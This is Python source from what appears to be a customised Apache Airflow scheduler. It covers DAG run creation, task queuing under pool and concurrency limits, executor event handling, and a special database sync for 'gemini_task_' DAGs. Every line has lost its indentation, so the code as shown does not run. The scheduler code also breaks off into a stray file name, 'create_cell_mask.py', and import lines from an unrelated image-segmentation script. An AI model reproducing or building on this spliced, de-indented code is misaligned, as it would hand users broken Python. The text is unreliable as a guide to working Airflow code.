# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
num_tasks_in_executor = 0
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: list[airflow.models.DAG]
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if conf.getboolean('core', 'CHECK_SLAS', fallback=True):
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
type(self)._create_dag_file_processor,
processor_timeout,
self.dag_ids,
pickle_dags,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(file_path, zombies, dag_ids, pickle_dags):
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessor(file_path,
pickle_dags,
dag_ids,
zombies)
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
# for dag in dagbag.dags.values():
# dag.sync_to_db()
is_gemini = set(map(lambda x: x.startswith("gemini_task_"), dagbag.dags.keys())) == {True}
if is_gemini:
self._sync_dags_to_db(dagbag)
else:
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = models.DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _sync_dags_to_db(self, dagbag: DagBag, session: Session=None) -> None:
'''
sync to db for gemini dag
'''
orm_dags: List[DagModel] = session.query(DagModel).filter(DagModel.dag_id.in_(dagbag.dags.keys())).all()
orm_dag_ids = [dag.dag_id for dag in orm_dags]
new_orm_dags = []
start_time = time.time()
def _update_orm_dag(orm_dag: DagModel, dag: DAG) -> DagModel:
orm_dag.is_subdag = False
orm_dag.fileloc = dag.fileloc
orm_dag.owners = dag.owner
orm_dag.is_active = True
orm_dag.last_scheduler_run = timezone.utcnow()
orm_dag.default_view = dag._default_view
orm_dag.description = dag.description
orm_dag.schedule_interval = dag.schedule_interval
orm_dag.tags = []
return orm_dag
for orm_dag in orm_dags:
dag: DAG = dagbag.dags[orm_dag.dag_id]
new_orm_dags.append(_update_orm_dag(orm_dag, dag))
for dag in [dag for dag in dagbag.dags.values() if dag.dag_id not in orm_dag_ids]:
orm_dag = DagModel(dag_id=dag.dag_id)
self.log.info(f"Creating ORM DAG for {dag.dag_id}")
orm_dag.is_paused = True
new_orm_dags.append(_update_orm_dag(orm_dag, dag))
session.add_all(new_orm_dags)
session.commit()
self.log.info(f"sync to db DagModel took {round(time.time() - start_time, 2)} seconds")
start_time = time.time()
# 进一步的优化点: SerializedDagModel 同步可以从 scheduler 中去掉, 将该部分逻辑放在任务上下线的接口中同步
serialized_dags: List[SerializedDagModel] = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dagbag.dags.keys())
).with_entities(
SerializedDagModel.dag_id,
SerializedDagModel.dag_hash
).all()
serialized_dags_dict = {k: v for k, v in serialized_dags}
for dag in dagbag.dags.values():
# 主要开销在 序列化 dag 的过程
new_serialized_dag = SerializedDagModel(dag)
serialized_dag_hash = serialized_dags_dict.get(dag.dag_id)
if serialized_dag_hash and serialized_dag_hash == new_serialized_dag.dag_hash:
self.log.debug(f"Serialized DAG ({dag.dag_id}) is unchanged. Skipping writing to DB")
else:
self.log.info(f"serialized_dag_hash = {serialized_dag_hash}; new = {new_serialized_dag.dag_hash}")
self.log.info(f"Writing Serialized DAG: {dag.dag_id} to the DB")
session.merge(new_serialized_dag)
self.log.info(f"DAG: {dag.dag_id} written to the DB")
session.commit()
self.log.info(f"sync to db SerializedDagModel took {round(time.time() - start_time, 2)} seconds")
|
create_cell_mask.py
|
import pickle
import tempfile
import time
from multiprocessing import Process, Queue
from queue import Empty
from typing import Sequence
import blosc
import cv2
import fire
import hpacellseg.cellsegmentator as cellsegmentator
import numpy as np
import skimage
import torch
import torch.nn.functional as F
